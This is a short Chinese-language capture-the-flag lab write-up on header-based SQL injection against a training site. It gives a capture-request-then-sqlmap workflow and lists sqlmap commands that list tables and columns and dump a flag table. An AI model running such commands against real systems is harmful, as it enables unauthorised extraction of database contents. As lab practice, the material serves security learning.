head(一)
注入环境:http://inject2.lab.aqlab.cn:81/Pass-07/index.php
前面我们都是用的手动注入,为了是了解原理,
既然原理清楚了后,我们为了提高效率,就可以使用工具来快速完成任务
攻击流程:
1;填写正确的账号密码,然后抓包
2;把抓到的数据保存为一个文件
3;用sqlmap来自动破解,
4;获取信息。
测试开始:
测试目标获取管理员账号密码
1;填写正确的账号密码,然后抓包
2;把抓到的数据保存为一个文件
3;用sqlmap来自动破解
sqlmap不会的,可以康康这篇博客sqlmap基础用法
4;获取信息。
获取表名
sqlmap.py -r 321.txt -D head_error --tables
获取字段
sqlmap.py -r 321.txt -D head_error -T flag_head --columns
获取字段值
sqlmap.py -r 321.txt -D head_error -T flag_head -C Id,flag_h1 --dump